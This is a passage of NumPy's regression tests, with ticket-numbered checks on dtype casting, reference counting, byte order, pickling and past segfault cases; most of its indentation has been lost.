assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
# Ticket #555
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
# Ticket #562
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
# Ticket #588
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
# Ticket #600
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
# Ticket #616
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_flat_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v):
x[(s > 0)] = v
# After removing deprecation, the following are ValueErrors.
# This might seem odd as compared to the value error below. This
# is due to the fact that the new code always uses "nonzero" logic
# and the boolean special case is not taken.
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
warnings.simplefilter('ignore', np.VisibleDeprecationWarning)
self.assertRaises(IndexError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(IndexError, ia, x, s, np.zeros(11, dtype=float))
# Old special case (different code path):
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(11, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
# Ticket #603
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
# Check argsort for strings containing zeros.
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
# Check sort for strings containing zeros.
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
# Ticket #658
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
# Ticket #657
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel):
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
        assert_equal(str(np.abs(x)), '[ 0.  0.  0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
# Ticket #658
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
# Ticket #771: strides are not set correctly when reshaping 0-sized
# arrays
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
# Ticket #633
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1-d broadcast slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1-d -> 2-d broadcast slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2-d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
tmp = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
tmp = arr1.repeat(3, axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3*5)
tmp = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
tmp = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
del tmp # Avoid pyflakes unused variable warning
def test_mem_custom_float_to_array(self, level=rlevel):
# Ticket 702
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp.astype(float) # Should succeed
def test_object_array_refcount_self_assign(self, level=rlevel):
# Ticket #711
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
# Ticket #713
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
# Ticket #714
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
# Ticket #640, floats from string
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
# Non-native endian arrays were incorrectly filled with scalars
# before r5034.
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
# Test for ticket #551, changeset r5140
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
        # y is now typically not aligned on an 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
# Ticket #788, changeset r5155
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
# Ticket #789, changeset 5217.
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype=np.single)
try:
a.compress([True, False], axis=1, out=b)
raise AssertionError("compress with an out which cannot be "
"safely casted should not return "
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
# Ticket #791
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
# These methods do not preserve subclasses
assert_(type(dat.nonzero()[0]) is np.ndarray)
assert_(type(dat.nonzero()[1]) is np.ndarray)
def test_recarray_tolist(self, level=rlevel):
# Ticket #793, changeset r5215
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
        # Make sure that .item() fails gracefully when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel):
# Ticket #825
for i in range(1, 9):
msg = 'unicode offset: %d chars' % i
t = np.dtype([('a', 'S%d' % i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
# Ticket 794.
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
# Ticket #674
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
# Ticket #816
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
# Ticket #840 - order should be an invalid keyword.
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
# Ticket #955
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
# No ticket
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tobytes())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tobytes())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
# Ticket #950
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
# Regression test for #1061.
        # Set a size which cannot fit into a 64-bit signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
# Regression test for #1062.
        # Set a size which cannot fit into a 64-bit signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
            a = np.arange(sz)
            self.assertTrue(a.size == sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
# Ticket #1058
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
# Ticket #1078: segfaults when creating an array with a sequence of
# 0d arrays.
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
# Ticket #1081: weird array with strange input...
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
# Ticket #1080.
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
# Ticket #1106.
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
# Ticket #1217, don't segfault.
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
# Ticket #1235.
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
# Ticket #1240.
a = np.array([[sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]],
dtype='U')
self.assertRaises(UnicodeEncodeError, np.array, a, 'S4')
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
# Ticket #1198 and #1267
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
# Ticket #1267
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
# Ticket #1267
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
# Ticket #1259 and gh-441
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
# Ticket #1299
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
# Ticket #1299 second test
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
# Ticket #1254
dtspec = [(('a', 'a'), 'i'), ('b', 'i')]
self.assertRaises(ValueError, np.dtype, dtspec)
def test_signed_integer_division_overflow(self):
# Ticket #1317.
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tobytes())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
# Ticket #2218
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
# The second use of itemsize was throwing an exception because in
# ctors.c, discover_itemsize was calling PyObject_Length without
# checking the return code. This failed to get the length of the
# number 2, and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
# Similar to GitHub issue #387
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
# GitHub issue #387
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# Test the same for a circular reference.
b = np.array(a, dtype=object)
a[()] = b
assert_raises(TypeError, int, a)
# Numpy has no tp_traverse currently, so circular references
# cannot be detected. So resolve it:
a[()] = 0
# This was causing a to become like the above
